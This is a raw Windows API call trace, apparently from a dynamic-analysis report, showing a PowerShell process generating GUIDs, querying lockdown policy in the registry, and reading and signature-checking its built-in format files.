	[0045.150] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xe2def9ce, Data2=0xddab, Data3=0x4d6c, Data4=([0]=0xa6, [1]=0x22, [2]=0x4c, [3]=0xd5, [4]=0x31, [5]=0x62, [6]=0x12, [7]=0xb2))) returned 0x0
	[0045.150] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x555440c4, Data2=0x3a66, Data3=0x4a8e, Data4=([0]=0xb2, [1]=0x50, [2]=0xe9, [3]=0x3a, [4]=0xca, [5]=0x50, [6]=0x1e, [7]=0x6a))) returned 0x0
	[0045.151] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa8a64c25, Data2=0x38a0, Data3=0x411f, Data4=([0]=0xb9, [1]=0xe0, [2]=0x38, [3]=0x94, [4]=0xf4, [5]=0x7, [6]=0xd7, [7]=0x88))) returned 0x0
	[0045.151] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x1b95efea, Data2=0xb7e8, Data3=0x4eba, Data4=([0]=0x93, [1]=0xa5, [2]=0x51, [3]=0x78, [4]=0x44, [5]=0x5d, [6]=0x4a, [7]=0x83))) returned 0x0
	[0045.151] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x95deae4d, Data2=0xc1c, Data3=0x4a38, Data4=([0]=0x81, [1]=0x89, [2]=0x57, [3]=0x83, [4]=0xa, [5]=0x6b, [6]=0x9c, [7]=0xdb))) returned 0x0
	[0045.151] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x53ecf139, Data2=0x1135, Data3=0x496e, Data4=([0]=0xb1, [1]=0x7d, [2]=0x1e, [3]=0x45, [4]=0x4, [5]=0x45, [6]=0x2b, [7]=0x95))) returned 0x0
	[0045.152] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xb396d361, Data2=0xe9c5, Data3=0x430d, Data4=([0]=0xb1, [1]=0x8c, [2]=0xf7, [3]=0xa7, [4]=0x59, [5]=0x80, [6]=0x7f, [7]=0xca))) returned 0x0
	[0045.152] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x8343e970, Data2=0xb34f, Data3=0x40c7, Data4=([0]=0x97, [1]=0xc8, [2]=0xf, [3]=0x98, [4]=0x1e, [5]=0x32, [6]=0x78, [7]=0xf2))) returned 0x0
	[0045.152] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa72c9016, Data2=0xfefa, Data3=0x4c34, Data4=([0]=0xab, [1]=0x2b, [2]=0x37, [3]=0x37, [4]=0xa3, [5]=0xab, [6]=0xea, [7]=0x4))) returned 0x0
	[0045.152] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf0d81451, Data2=0xd28, Data3=0x4eb1, Data4=([0]=0xb3, [1]=0x7f, [2]=0x9a, [3]=0xd4, [4]=0xe, [5]=0xa0, [6]=0x71, [7]=0x3d))) returned 0x0
	[0045.152] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x8d0fbabc, Data2=0x7c37, Data3=0x47a1, Data4=([0]=0x98, [1]=0x87, [2]=0xd4, [3]=0xa, [4]=0xb7, [5]=0x6d, [6]=0xc6, [7]=0x2a))) returned 0x0
	[0045.152] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x1ef07be5, Data2=0xcb25, Data3=0x4e98, Data4=([0]=0xaf, [1]=0x91, [2]=0x2, [3]=0x16, [4]=0x46, [5]=0x95, [6]=0xa5, [7]=0xfe))) returned 0x0
	[0045.152] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x8ad3a358, Data2=0x6c61, Data3=0x44c9, Data4=([0]=0xb1, [1]=0x3c, [2]=0x16, [3]=0xfb, [4]=0x9a, [5]=0x27, [6]=0xc0, [7]=0x5f))) returned 0x0
	[0045.153] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xbb7ce93d, Data2=0x8ed4, Data3=0x4833, Data4=([0]=0xb8, [1]=0xcb, [2]=0xc5, [3]=0x38, [4]=0xd5, [5]=0x41, [6]=0xcd, [7]=0xfd))) returned 0x0
	[0045.153] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x2df15239, Data2=0x9c8e, Data3=0x48e6, Data4=([0]=0x98, [1]=0xc8, [2]=0x14, [3]=0x24, [4]=0xc9, [5]=0x72, [6]=0xed, [7]=0xa7))) returned 0x0
	[0045.153] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x1c6c270c, Data2=0xab4c, Data3=0x4cba, Data4=([0]=0x93, [1]=0xf7, [2]=0x8b, [3]=0xb0, [4]=0xf7, [5]=0xe7, [6]=0x31, [7]=0xc4))) returned 0x0
	[0045.153] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x5463f6e9, Data2=0xd1cd, Data3=0x4f6e, Data4=([0]=0x99, [1]=0xd2, [2]=0x47, [3]=0x3b, [4]=0x7b, [5]=0xea, [6]=0xba, [7]=0x10))) returned 0x0
	[0045.154] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x3f1313a, Data2=0x5e7b, Data3=0x4854, Data4=([0]=0x92, [1]=0xa2, [2]=0x75, [3]=0x77, [4]=0x64, [5]=0x43, [6]=0x5e, [7]=0x7e))) returned 0x0
	[0045.154] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa77292b6, Data2=0xfd26, Data3=0x40e5, Data4=([0]=0xa0, [1]=0x14, [2]=0xbe, [3]=0x79, [4]=0x9, [5]=0xf8, [6]=0x61, [7]=0xf2))) returned 0x0
	[0045.154] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x94935b07, Data2=0x813e, Data3=0x42c5, Data4=([0]=0xab, [1]=0x3b, [2]=0x9, [3]=0x50, [4]=0xaf, [5]=0x18, [6]=0x1c, [7]=0x1))) returned 0x0
	[0045.154] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xde620cf8, Data2=0x45f4, Data3=0x4779, Data4=([0]=0x86, [1]=0x87, [2]=0x1a, [3]=0x3f, [4]=0xf4, [5]=0xde, [6]=0xb1, [7]=0xa4))) returned 0x0
	[0045.155] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x2356072a, Data2=0xe63, Data3=0x40a9, Data4=([0]=0xa3, [1]=0xc5, [2]=0x75, [3]=0x35, [4]=0x3d, [5]=0x47, [6]=0x8b, [7]=0xe0))) returned 0x0
	[0045.155] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc5ca5f8d, Data2=0x1b08, Data3=0x4cf3, Data4=([0]=0xae, [1]=0xc8, [2]=0xc2, [3]=0x4, [4]=0x78, [5]=0xfa, [6]=0x9, [7]=0x22))) returned 0x0
	[0045.155] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x1e0da086, Data2=0xdd3f, Data3=0x4ae6, Data4=([0]=0x8f, [1]=0xf9, [2]=0x74, [3]=0xa4, [4]=0x4, [5]=0x5a, [6]=0x21, [7]=0x8e))) returned 0x0
	[0045.156] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xfaae2030, Data2=0xe957, Data3=0x492b, Data4=([0]=0x93, [1]=0x5a, [2]=0xb1, [3]=0x31, [4]=0xdd, [5]=0x80, [6]=0x6b, [7]=0xe4))) returned 0x0
	[0045.156] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x7a260b79, Data2=0x3507, Data3=0x4fb1, Data4=([0]=0x90, [1]=0x77, [2]=0x25, [3]=0x51, [4]=0xd8, [5]=0x31, [6]=0x40, [7]=0x68))) returned 0x0
	[0045.156] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xfaed7a79, Data2=0x19d8, Data3=0x46f8, Data4=([0]=0xa9, [1]=0x1, [2]=0x8c, [3]=0x29, [4]=0x84, [5]=0x5, [6]=0xdf, [7]=0x40))) returned 0x0
	[0045.156] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa292fc70, Data2=0x4de2, Data3=0x4d7f, Data4=([0]=0x86, [1]=0x3b, [2]=0xa9, [3]=0x31, [4]=0xab, [5]=0x83, [6]=0x6c, [7]=0xee))) returned 0x0
	[0045.156] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x2b1aeda1, Data2=0xf766, Data3=0x41e3, Data4=([0]=0x8e, [1]=0x36, [2]=0x0, [3]=0xd9, [4]=0xd9, [5]=0x27, [6]=0x36, [7]=0xe2))) returned 0x0
	[0045.157] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa532505a, Data2=0xcfe8, Data3=0x48bc, Data4=([0]=0x8b, [1]=0x70, [2]=0x7c, [3]=0x24, [4]=0x6d, [5]=0x5e, [6]=0xe3, [7]=0x52))) returned 0x0
	[0045.157] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x34e97b05, Data2=0x67bb, Data3=0x4896, Data4=([0]=0xa6, [1]=0xa5, [2]=0x66, [3]=0xef, [4]=0x4a, [5]=0xe5, [6]=0x6f, [7]=0xff))) returned 0x0
	[0045.157] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9a9e97a3, Data2=0x15ee, Data3=0x4230, Data4=([0]=0x99, [1]=0xb, [2]=0x68, [3]=0xe8, [4]=0x55, [5]=0x9b, [6]=0x8b, [7]=0xa6))) returned 0x0
	[0045.157] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa06a118d, Data2=0xa977, Data3=0x4ea9, Data4=([0]=0x94, [1]=0xea, [2]=0x60, [3]=0x38, [4]=0xc3, [5]=0x78, [6]=0x16, [7]=0x42))) returned 0x0
	[0045.157] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xd47eaabb, Data2=0xb441, Data3=0x4004, Data4=([0]=0x8f, [1]=0x60, [2]=0x41, [3]=0x62, [4]=0x43, [5]=0x9f, [6]=0x61, [7]=0xc8))) returned 0x0
	[0045.158] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8970
	[0045.158] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.158] CoTaskMemFree (pv=0x1505f3b8970) 
	[0045.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cef0) returned 1
	[0045.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cfd0 | out: lpFileInformation=0x184b47cfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0045.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ceb0) returned 1
	[0045.158] WldpGetLockdownPolicy () returned 0x0
	[0045.158] GetSystemInfo (in: lpSystemInfo=0x184b47d030 | out: lpSystemInfo=0x184b47d030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.158] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cf38 | out: phkResult=0x184b47cf38*=0x3d8) returned 0x0
	[0045.158] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf88, lpData=0x0, lpcbData=0x184b47cf80*=0x0 | out: lpType=0x184b47cf88*=0x0, lpData=0x0, lpcbData=0x184b47cf80*=0x0) returned 0x2
	[0045.158] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf60) returned 1
	[0045.159] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0045.159] GetFileType (hFile=0x3d8) returned 0x1
	[0045.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0045.159] GetFileType (hFile=0x3d8) returned 0x1
	[0045.159] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x0
	[0045.159] ReadFile (in: hFile=0x3d8, lpBuffer=0x150479679d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150479679d8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.160] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1000
	[0045.160] ReadFile (in: hFile=0x3d8, lpBuffer=0x150479679d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150479679d8*, lpNumberOfBytesRead=0x184b47cf98*=0x1, lpOverlapped=0x0) returned 1
	[0045.160] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1001
	[0045.160] ReadFile (in: hFile=0x3d8, lpBuffer=0x150479679d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150479679d8*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0045.160] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6bb0
	[0045.160] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6bb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.160] CoTaskMemFree (pv=0x1505f3b6bb0) 
	[0045.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0045.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ceb0) returned 1
	[0045.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf90 | out: lpFileInformation=0x184b47cf90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0045.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce70) returned 1
	[0045.161] WldpGetLockdownPolicy () returned 0x0
	[0045.161] GetSystemInfo (in: lpSystemInfo=0x184b47cff0 | out: lpSystemInfo=0x184b47cff0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.161] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cef8 | out: phkResult=0x184b47cef8*=0x5b8) returned 0x0
	[0045.161] RegQueryValueExW (in: hKey=0x5b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf48, lpData=0x0, lpcbData=0x184b47cf40*=0x0 | out: lpType=0x184b47cf48*=0x0, lpData=0x0, lpcbData=0x184b47cf40*=0x0) returned 0x2
	[0045.161] RegCloseKey (hKey=0x5b8) returned 0x0
	[0045.161] CloseHandle (hObject=0x3d8) returned 1
	[0045.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0045.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf10) returned 1
	[0045.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1504796fd68 | out: lpFileInformation=0x1504796fd68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1001)) returned 1
	[0045.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0045.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0045.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0045.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1001)) returned 1
	[0045.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0045.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0045.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0045.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0045.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd60) returned 1
	[0045.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47ce40 | out: lpFileInformation=0x184b47ce40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1001)) returned 1
	[0045.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cd20) returned 1
	[0045.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0045.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ccf0) returned 1
	[0045.162] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0045.162] GetFileType (hFile=0x3d8) returned 0x1
	[0045.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc60) returned 1
	[0045.162] GetFileType (hFile=0x3d8) returned 0x1
	[0045.162] WTGetSignatureInfo () returned 0x0
	[0045.183] CertDuplicateCertificateContext (pCertContext=0x1505fba72a0) returned 0x1505fba72a0
	[0045.183] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cd88 | out: phkResult=0x184b47cd88*=0x5f4) returned 0x0
	[0045.183] RegQueryValueExW (in: hKey=0x5f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x0, lpcbData=0x184b47cdd0*=0x0 | out: lpType=0x184b47cdd8*=0x1, lpData=0x0, lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0045.183] RegQueryValueExW (in: hKey=0x5f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x15047970a08, lpcbData=0x184b47cdd0*=0x56 | out: lpType=0x184b47cdd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0045.183] RegCloseKey (hKey=0x5f4) returned 0x0
	[0045.183] CoTaskMemAlloc (cb=0x10) returned 0x1505fb06f10
	[0045.183] CoTaskMemAlloc (cb=0x50) returned 0x1505f464fe0
	[0045.183] WinVerifyTrust () returned 0x0
	[0045.184] CoTaskMemFree (pv=0x1505f464fe0) 
	[0045.184] CoTaskMemFree (pv=0x1505fb06f10) 
	[0045.184] CertFreeCertificateContext (pCertContext=0x1505fba72a0) returned 1
	[0045.184] CloseHandle (hObject=0x3d8) returned 1
	[0045.185] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8970
	[0045.185] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.185] CoTaskMemFree (pv=0x1505f3b8970) 
	[0045.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0045.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cfa0) returned 1
	[0045.185] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47d080 | out: lpFileInformation=0x184b47d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0045.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cf60) returned 1
	[0045.185] WldpGetLockdownPolicy () returned 0x0
	[0045.185] GetSystemInfo (in: lpSystemInfo=0x184b47d0e0 | out: lpSystemInfo=0x184b47d0e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.185] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cfe8 | out: phkResult=0x184b47cfe8*=0x3d8) returned 0x0
	[0045.185] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47d038, lpData=0x0, lpcbData=0x184b47d030*=0x0 | out: lpType=0x184b47d038*=0x0, lpData=0x0, lpcbData=0x184b47d030*=0x0) returned 0x2
	[0045.185] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.185] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x62c87d1c, Data2=0x18ee, Data3=0x4b3b, Data4=([0]=0xae, [1]=0x8a, [2]=0xbe, [3]=0xb5, [4]=0x14, [5]=0x2f, [6]=0xaf, [7]=0xc1))) returned 0x0
	[0045.185] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa0d97a1e, Data2=0x247d, Data3=0x4f59, Data4=([0]=0xa0, [1]=0xba, [2]=0x51, [3]=0xfc, [4]=0xf8, [5]=0x47, [6]=0x62, [7]=0xb4))) returned 0x0
	[0045.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0045.186] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6bb0
